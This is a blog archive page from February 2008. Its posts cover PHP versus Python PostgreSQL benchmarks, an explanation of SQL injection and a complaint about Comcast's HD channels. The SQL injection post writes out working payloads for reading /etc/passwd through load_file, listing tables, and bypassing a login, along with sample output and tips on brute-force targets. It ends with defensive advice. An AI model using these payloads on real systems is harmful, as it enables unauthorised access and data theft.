Archive for February, 2008

PHP And pg_connect: Post Mortem

Sunday, February 24th, 2008

In my previous post, I tried to find out why a PHP script was so slow. Here’s an update from then.

Basically, pg_connect is slow. There’s probably a lot of PHP overhead to connect to a database plus it probably expects to be opening a fresh connection everytime, as using pooled connections doesn’t seem to speed it up very much (it goes from ~50 requests a second to ~200). Persistent connections seem to be much faster, albeit much slower than connecting to a pool with Python (450 requests a second compared to 1000), however, if you understand the inner workings of persistent connections you will know that using them with PostgreSQL is seriously broken, as a small number of users connecting to different sites on the same server can easily exhaust max_connections. Using pg_pconnect to connect to a connection pool doesn’t work either; it’s like combining the worst of both: the slowness of pg_connect, and the broken-ness of pg_pconnect.

So there’s pretty much no solution to this problem at this point in time, except maybe to port the script to Python.

humongous professional douchebag

PHP Is Slow… Really Slow

Friday, February 22nd, 2008

Lately, I’ve been trying to figure out what’s slowing down a site that’s currently in development… It didn’t take long to figure out what it was.

There’s a script on the server that handles image requests transparently, ie, utilizing mod_rewrite. Basically what it does is this:

  1. Connect to database.
  2. Query the database for the meta info of the requested file (created, modified, filetype, etc).
  3. Check if the client has a cached copy of the image, and if it does, send a 304: Not Modified, an ETag, and return.
  4. If not, grab the file from server-side cache if it exists, send it, and return.
  5. Else, fetch the image from the database, cache it locally on disk, and send the data.

99% of the time, all it does it grab the meta data, and send a 304 Not Modified, yet, it is extremely slow, so I decided to do a quick benchmark of PHP and Python, comparing how fast they deliver a small image (about 10kb) from a PostgreSQL database… The results were shocking.

The setup is very modest, an Athlon 64 3200+, 2GB ram, and a 500GB 7200.10 SATA II hard drive. The test is very simple: connect to the database, of which the connections are pooled by pgpool, fetch and send the image, then close the database connection.

The code used is as followed.

PHP:

// Note it's port 5433. That's the port that pgpool listens on.

$con = pg_connect("dbname=testdb user=testuser host=127.0.0.1"
    . " password=password port=5433");

$res = pg_query("SELECT data, filetype FROM images WHERE id = 1");
$res = pg_fetch_assoc($res);

header('Content-Type: ' . $res['filetype']);
echo pg_unescape_bytea($res['data']);

pg_close($con);

And now Python:

import psycopg2
from mod_python import apache

def handler(req):
    con = psycopg2.connect("dbname='testdb' user='testuser'"
        + " host='127.0.0.1' password='password' port='5433'")
    cur = con.cursor()

    cur.execute("SELECT data, filetype FROM images WHERE id = 1")
    row = cur.fetchone()
    con.close()

    req.content_type = row[1]
    req.write(row[0])
    return apache.OK

Pretty simple, right? I ran the test using ab, or Apache Benchmark, with the command:

ab -c 10 -t 15 http://localhost/<scriptname>

I ran the test three times for each script, here’s the results:

PHP - Maximum Requests/Second: 145.32
Python - Maximum Requests/Second: 1088.64
Apache2 Static Image - Max Requests/Second - 2778.54

WOW! Python is nearly 8 times faster than PHP in this test! I was so intrigued, I decided to dig deeper to see exactly what the bottleneck is in PHP.

I created a new test: Connect to the database, and close the connection immediately, don’t send any data whatsoever.

Here’s the results from that:

PHP - Max Requests/Second: 205.00
Python - Max Requests/Second: 1089.32

So PHP gains ~50 requests/second, and Python has no improvement at all. But what if we just leave the scripts blank? Basically just return and do nothing at all? Here’s the results from that:

PHP - Max Requests/Second: 1566.77
Python - Max Requests/Second: 1819.46

So basically, PHP sucks, at least when it comes to PostgreSQL connections. What’s strange is PHP doesn’t seem to have the same problem with MySQL connections, where by simply connecting to the database, performance drops significantly, so something is certainly wrong with the way PHP handles PostgreSQL. I bet there’s a lot of “MySQL vs. PostgreSQL” benchmarks out there that wield wildly inaccurate results because of this. Actually, if you compare MySQL and PostgreSQL purely in Python, you’ll find that PostgreSQL is quite a bit faster at handling binary data, such as images. I will be back if I find more information or a fix for this behavior.

UPDATE: it looks like the problem lies specifically with the pg_connect function. This problem doesn’t exists with pg_pconnect, however, you cannot connect to a database pool like pgpool/pgbounder with pg_pconnect, as that degrades performance.

Understanding SQL Injection

Wednesday, February 20th, 2008

In order to understand how to protect your application from SQL Injection attacks, it’s a good idea to understand how SQL Injection works.

One big mistake people have is forgetting to turn off debugging. Debugging information is the holy grail for hackers. Not only can they attack your application, but they can also see the internals of your database, and worse! As is the case with mysql, you can actually load files from the server, and workout a plan to compromise the server! Suppose you have a simple login form, with fields “Username” and “Password”. The table might look something like this:

id INTEGER,
username VARCHAR(32),
password VARCHAR(64)

Let’s assume the programmer forgot to quote the password correctly. Now, by manipulating the unquoted field, a hacker can easily craft a query like this:

SELECT * FROM users WHERE username = ‘bob’ AND password = ‘‘ OR 1=1 UNION SELECT null,load_file(’/etc/passwd’),null; — ‘;

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:105:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
cupsys:x:106:113::/home/cupsys:/bin/false
haldaemon:x:107:114:Hardware abstraction layer,,,:/home/haldaemon:/bin/false
hplip:x:108:7:HPLIP system user,,,:/var/run/hplip:/bin/false
user1:x:109:7:User 1,,,:/home/user1:/bin/bash

As you can see, the result returned all of the users in /etc/passwd. This information can be used to find acceptable user accounts to be brute forced, for instance, user1 has a bash shell and a password, unlike unlike cupsys which can only run commands via sudo since it has no password and no shell. This same method can be used to download binary files, such as to find a vulnerable version of a program.

With other database systems, however, you can’t do this, since MySQL is the only database server that, to my knowledge, supports the load_file function. You can, however, gain access to an application with other database systems, or find more information about the database layout. For instance, using the same vulnerability as before but with PostgreSQL, you can run this instead:

SELECT * FROM users WHERE username = ‘foo’ AND password = ‘‘ OR 1=1 UNION SELECT 0,tablename,null FROM pg_tables WHERE schemaname = ‘public’; —’‘;

id | username | password
—-+———————-+———-
0 | pages |
0 | creditcard_numbers |
0 | users |

That query returns all of the tables in the database, for further manipulation and data theft. What makes this dangerous is databases that hold sensitive information, such as credit card numbers, social security/national ID numbers, addresses, and email accounts.

However, not all applications have debugging turned on, so instead what you can do is first gain access to the site by changing a few things in the above queries, then deface or steal data from the admin panel. This can be done quite easily.

SELECT * FROM users WHERE username = ‘foo’ AND password = ‘‘ OR 1=1 LIMIT 1; — ‘‘;

That query will always return with one row, and thus can allow a hacker to gain access to a site.

One thing to remember is everything has bugs. Whether or not those bugs can be used to create an exploit is up in the air. Always sanitise your input. Cast fields that are supposed to be integers as such (ie. $id = (int)$_GET[’id’]), and most importantly, always escape and quote all input before running a query.

Comcasts HD Lineup Sucks

Sunday, February 17th, 2008

It’s plain and simple: Comcasts HD lineup sucks.I live in the Tacoma, WA area, and Comcast’s HD lineup here is absolute crap. I have, maybe, 20 HD channels. For Christ’s sake, Dish Network has more HD than Comcast, and I am pissed off because Comcast keeps running these commercials, saying they have more HD than anyone else. LIES!Let’s run through a couple HD channels that DirectTV has, and Comcast doesn’t:

  • CNN HD
  • TLC HD
  • Discovery HD
  • Nickelodeon HD
  • Cartoon Network HD
  • FX HD
  • Spike HD
  • SciFi HD
  • CMT HD
  • MTV HD
  • TBS HD
  • CNBC HD
  • Bravo HD
  • Food Network HD
  • Versus HD
  • Science Channel HD
  • MGM HD
  • Speed HD
  • Movie Channel HD
  • Fox Business HD

Comcast started rolling out new HD channels in the Philadelphia area, and they promote those channels in their advertisements, even though that’s the only area that has those channels. I’m fed up with this BS.